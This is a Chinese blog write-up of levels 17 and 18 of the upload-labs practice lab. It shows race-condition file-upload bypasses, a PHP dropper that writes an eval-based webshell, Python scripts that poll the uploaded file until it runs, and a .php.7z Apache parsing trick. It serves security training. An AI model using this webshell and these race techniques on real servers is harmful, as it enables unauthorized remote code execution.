upload-labs之第十七和十八关

最新推荐文章于 2024-08-05 21:55:30 发布
最新推荐文章于 2024-08-05 21:55:30 发布
阅读量2.1k 收藏 4
点赞数
分类专栏: upload-labs 文章标签: javascript 开发语言 ecmascript php apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_38294816/article/details/121024014
版权

Pass17

打开第十七关,通过提示发现跟以前的都不一样。

看来是需要进行代码审计了,那么来看看源码吧

$is_upload = false;$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = UPLOAD_PATH . '/' . $file_name;

    if(move_uploaded_file($temp_file, $upload_file)){
        if(in_array($file_ext,$ext_arr)){
             $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);
             $is_upload = true;
        }else{
            $msg = "只允许上传.jpg|.png|.gif类型文件!";
            unlink($upload_file);
        }
    }else{
        $msg = '上传出错!';
    }}

从源码来看,服务器先是将上传的文件保存下来,然后将文件的后缀名同白名单对比,如果是jpg、png、gif中的一种,就将文件进行重命名。如果不符合的话,unlink()函数就会删除该文件。

这么看来如果我们还是上传一个图片马的话,网站依旧存在文件包含漏洞我们还是可以进行利用。但是如果没有文件包含漏洞的话,我们就只能上传一个php木马来解析运行了。

那还怎么搞?上传上去就被删除了,我还怎么去访问啊。

不慌不慌,要知道代码执行的过程是需要耗费时间的。如果我们能在上传的一句话被删除之前访问不就成了。这个也叫做条件竞争上传绕过。

我们可以利用burp多线程发包,然后不断在浏览器访问我们的webshell,会有一瞬间的访问成功。

为了更好的演示效果,把一句话木马换一下改为:

<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST["test"])?>');?>

把这个php文件通过burp一直不停的重放,然后再写python脚本去不停的访问我们上传的这个文件,总会有那么一瞬间是还没来得及删除就可以被访问到的,一旦访问到该文件就会在当前目录下生成一个shell.php的一句话。在正常的渗透测试中这也是个好办法。因为单纯的去访问带有phpinfo()的文件并没有什么卵用。一旦删除了还是无法利用。但是这个办法生成的shell.php服务器是不会删除的,我们就可以通过蚁剑去链接了。

第一步:上传cs.php,并用burp抓包

第二步:设置无限重放,一直上传该文件

可以看到这里的配置Payload type是Null payloads。也就是不设置payload。

下方的Continue indefinitely也就是无限重放的意思。

可以看到上传该文件的数据包不停地在进行重放。

第三步:运行python脚本不停地访问cs.php知道成功访问到为止。

代码如下:

import requests

url = "http://www.bj.com/upload-labs/upload/cs.php"

while True:

    html = requests.get(url)

    if html.status_code == 200:

        print("OK")

        break

当出现OK说明访问到了该文件,那么shell.php应该也创建成功了,用蚁剑连一下试试。

Pass18

打开第十八关,发现还是需要代码审计。那么再来看看源码吧。

//index.php$is_upload = false;$msg = null;if (isset($_POST['submit'])){
    require_once("./myupload.php");
    $imgFileName =time();
    $u = new MyUpload($_FILES['upload_file']['name'], $_FILES['upload_file']['tmp_name'], $_FILES['upload_file']['size'],$imgFileName);
    $status_code = $u->upload(UPLOAD_PATH);
    switch ($status_code) {
        case 1:
            $is_upload = true;
            $img_path = $u->cls_upload_dir . $u->cls_file_rename_to;
            break;
        case 2:
            $msg = '文件已经被上传,但没有重命名。';
            break; 
        case -1:
            $msg = '这个文件不能上传到服务器的临时文件存储目录。';
            break; 
        case -2:
            $msg = '上传失败,上传目录不可写。';
            break; 
        case -3:
            $msg = '上传失败,无法上传该类型文件。';
            break; 
        case -4:
            $msg = '上传失败,上传的文件过大。';
            break; 
        case -5:
            $msg = '上传失败,服务器已经存在相同名称文件。';
            break; 
        case -6:
            $msg = '文件无法上传,文件不能复制到目标目录。';
            break;      
        default:
            $msg = '未知错误!';
            break;
    }}
//myupload.phpclass MyUpload{.................. 
  var $cls_arr_ext_accepted = array(
      ".doc", ".xls", ".txt", ".pdf", ".gif", ".jpg", ".zip", ".rar", ".7z",".ppt",
      ".html", ".xml", ".tiff", ".jpeg", ".png" );
..................  
  /** upload()
   **
   ** Method to upload the file.
   ** This is the only method to call outside the class.
   ** @para String name of directory we upload to
   ** @returns void
  **/
  function upload( $dir ){
    
    $ret = $this->isUploadedFile();
    
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }

    $ret = $this->setDir( $dir );
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }

    $ret = $this->checkExtension();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }

    $ret = $this->checkSize();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );    
    }
    
    // if flag to check if the file exists is set to 1
    
    if( $this->cls_file_exists == 1 ){
      
      $ret = $this->checkFileExists();
      if( $ret != 1 ){
        return $this->resultUpload( $ret );    
      }
    }

    // if we are here, we are ready to move the file to destination

    $ret = $this->move();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );    
    }

    // check if we need to rename the file

    if( $this->cls_rename_file == 1 ){
      $ret = $this->renameFile();
      if( $ret != 1 ){
        return $this->resultUpload( $ret );    
      }
    }
    
    // if we are here, everything worked as planned :)

    return $this->resultUpload( "SUCCESS" );
  
  }.................. };

从源码来看的话,服务器先是将文件后缀跟白名单做了对比,然后检查了文件大小以及文件是否已经存在。文件上传之后又对其进行了重命名。

这么看来的话,php是不能上传了,只能上传图片马了,而且需要在图片马没有被重命名之前访问它。要让图片马能够执行还要配合其他漏洞,比如文件包含,apache解析漏洞等。

这里还是将前一关的代码插入图片作出图片马。然后通过文件包含去访问该图片马。

第一步:生成图片马

第二步:上传图片马,通过burp抓包无限重放

 

第三步:修改python脚本,不断通过文件包含访问图片马

这里如果没有访问到该图片返回的状态码也是200,所有前面的脚本不可以用了,需要修改如下:

import requests

url = "http://www.bj.com/upload-labs/upload/include.php?page=./../shell.png"

while True:

    html = requests.get(url)

    if ( 'Warning'  not in  str(html.text)):

        print('ok')

        break

这里写出./..shell.png是因为最后重命名的文件就是在根目录下,原本以为刚上传上去的也是在根目录或者upload目录,结果不知道怎么没跑出来,后面如果实现了具体的过程会补充齐全的。

同样的这也属于条件竞争的一种,只不过文件的形式不同而已。其实可以直接上传图片马,因为页面会回显改名后的图片马的位置,直接文件包含也能生成shell.php。

值得注意的是这里也可以将php文件后缀名更改为.php.7z,因为白名单中允许上传.7z的文件,但是apache又不能解析这个格式,所以会把该文件当php的格式解析。

阜城小柳
关注
专栏目录
upload-labs17
qq_46527080的博客
12-25 1345
第十七(二次渲染) 源码分析 imagecreatefromjpeg — 由文件或 URL 创建一个新象。 然后将第一个我们写入的一句话木马给转码掉了,我们找到渲染的分割线,在分割线之前来进行写入一句话木马 首先制造片码,gif的后缀 制作完成之后在上传 上传成功之后,再下载下来查看 发现咱们的码没有了 要找渲染的分隔点 从这里可以看出,这里开始有变化,咱们看看 然后上传之后在下载 然后下载,发现一句话木马可以了 如果复制不可以的话,我们可以手敲一句话木马 然后我们再利用文件包含漏洞进行解析 http
Upload-Lab17:二次渲染技巧轻松绕过上传限制!
最新发布
didiplus
08-24 686
文件上传漏洞一直是网络安全中一个重要且复杂的领域。在Upload-Lab的第17,我们将探讨如何利用二次渲染技术绕过文件上传验证限制。二次渲染是指服务器在文件上传后,再次处理或修改文件内容的过程。攻击者可以利用这一过程,上传一个看似安全的文件,但通过服务器的二次处理,将其转换为恶意文件。例如,上传一个合法的片文件,但在服务器处理过程中,将其内容转变为恶意脚本。
制作片马:二次渲染(upload-labs第17)
m0_72286569的博客
03-12 2451
在本的代码中这个imagecreatefromjpeg();函数起到了将上传的片打乱并重新组合。这就意味着在制作片马的时候要将木马插入到片没有被改变的部分。
upload-labs靶场第17设计PHP函数解析
永远是少年
09-13 864
今天继续给大家介绍渗透测试相知识,为了方便大家对upload-labs靶场第17的理解,本文主要内容是upload-labs靶场第17设计PHP函数解析。 一、move_upload_file()函数 二、imagecreatefromjpeg()函数 三、srand()函数 四、strval()函数 五、imagejpeg()函数 六、unlink()函数
Upload-Labs(17-20)
Braindance
02-28 286
Pass-17 ​ (windows环境,php版本5.2.17,题号是18题) 源码: $is_upload = false; $msg = null; if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); $file_name = $_FILES['upload_file']['name']; $temp_file = $_FILES['upload_file']['tmp_name']; .
文件上传--Upload-labs--Pass17--条件竞争
2302_79800344的博客
02-20 963
条件竞争原理
Upload-labs第17 二次渲染 gif方法
sinat_33270167的博客
07-26 1426
Upload-labs第17 二次渲染 gif方法
upload-labs 12-17 详解
qq_53409748的博客
03-01 644
upload-labs 12-17 详解
upload-labs十六十七
m0_74344277的博客
09-11 177
源码上片码,片码制作比较简单。需要一张真的片, 一个php文件。然后将片和php文件组合在一起即可。准备一张片和一句话木马然后在cmd中执行。代码中$im = imagecreatefromjpeg($target_path);会对片进行二次渲染。二次渲染的时候把码的信息给干掉了。怎么办呢?把原和他修改过的片进行比较,看看哪个部分没有被修改。将php代码放到没有被更改的部分,再重新上传即可绕过。
upload-labs 1-20
weixin_58358185的博客
10-30 594
upload-labs
Upload-labs通攻略(适合新手)
夜思红尘的博客
04-12 2291
这是一篇upload-labs通攻略,适合新手
upload-labs17
weixin_40709439的博客
09-17 2010
 upload-labs 一个帮你总结所有类型的上传漏洞的靶场 文件上传靶机下载地址:https://github.com/c0ny1/upload-labs 第17题,条件竞争删除文件绕过 源码: $is_upload = false; $msg = null; if(isset($_POST['submit'])){ $ext_arr = array('jpg','png...
upload-labs 1-17,实操通记录
qq_51954912的博客
04-18 873
1-x操作过程第一第二第三 第一 首先写上木马,然后查看源码 可以得知只允许上传jpg,png,gif,文件,然后我们可以将一句话木马后缀改为以上后缀 用burp抓包改包 改为php文件 上传成功 或者直接上传片马,但是据说好像片马不会被php代码直接识别不太好用(但是,这之说文件上传,不用连接数据库) 第二 查看源码,跟DVWA的Medium等级的代码都一摸一样 就是MIME类型的文件上传,可以看DVWA文件上传 第三 ...
文件上传漏洞——upload-labs靶场安装和通记录17
m0re's blog
05-12 2680
前言:之前在DVWA靶场上了解了upload文件上传漏洞,并进行了学习,现在来安装upload-labs来打一下靶场。 本文目录搭建靶场开始闯Pass-01Pass-02Pass-03黑名单验证Pass-04黑名单 搭建靶场 phpstudy集成环境。 upload-labs项目地址upload-labs,下载压缩包解压到本地phpstudy的www文件夹下,将文件夹命名为upload-labs...
漏洞复现篇——条件竞争漏洞(upload-labs---17
爱国小白帽
02-18 4510
条件竞争漏洞是一种服务器端的漏洞,由于服务器端在处理不同用户的请求时是并发进行的,因此,如果并发处理不当或相操作逻辑顺序设计的不合理时,将会导致此类问题的发生。 实验环境: PHPstudy Burp Suite抓包软件 | 下载 | 教程 | upload-labs-master上传漏洞靶场 火狐浏览器 第十六 1、创建PHP文件 源码: <?php $f= fopen ...
upload靶场第十七 二次渲染绕过 jpg格式
2301_79650865的博客
02-09 467
upload靶场第十七 二次渲染绕过 jpg格式,详细教程
upload-labs通(第16-第17
qq_73985955的博客
08-05 595
我们接下来就可以使用蚁剑进行连接,url的构造和前面的一样,但我这无论怎么弄都没成功连接上,看了其他大佬的wp,他们也是这样做的,能连接上,方法大概是这样了,如果有连接上的告诉我一声(对了,这里如果使用其他格式的片会比较难弄,所以我就没弄)找到两个gif相同的地方,我们把一句话复制,然后在23917.gif中插入一句话,保存,上传23917.gif文件。然后进行比较,我们通过观察发现不同的地方,并且我们插入的一句话,在下载的gif里面已经被打乱了,没有找到。3.找到[exif]段,把下面语句的分号去掉。
Upload-labs十六和十七
weixin_54986292的博客
09-11 470
target_path)返回true的时候,就已经成功将片马上传到服务器了,所以下面的二次渲染并不会影响到片马的上传.如果是想考察文件后缀和content-type的话,那么二次渲染的代码就很多余.(到底考点在哪里,只有作者清楚.哈哈)由于在二次渲染时重新生成了文件名,所以可以根据上传后的文件名,来判断上传的片是二次渲染后生成的片还是直接由move_uploaded_file函数移动的片.成功上传含有一句话的111.gif,但是这并没有成功.我们将上传的片下载到本地.>添加到gif的尾部.
upload-labs靶场通指南(16-17
永远是少年
09-13 1172
今天继续给大家介绍渗透测试相知识,本文主要内容是upload-labs靶场通指南(16-17)。 一、第16 二、第17
upload-labs第十七
11-09
upload-labs第十七是一个上传漏洞靶场,需要使用Burp Suite抓包软件进行操作。在第十七中,用户需要打开一个页面并输入指定路径,然后通过利用条件竞争漏洞来上传恶意文件。条件竞争漏洞是一种服务器端的漏洞,由于服务器端在处理不同用户的请求时是并发进行的,因此,如果并发处理不当或相操作逻辑顺序设计的不合理时,将会导致此类问题的发生。通过上传恶意文件,用户可以获取服务器的权限,从而进行更多的攻击行为。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值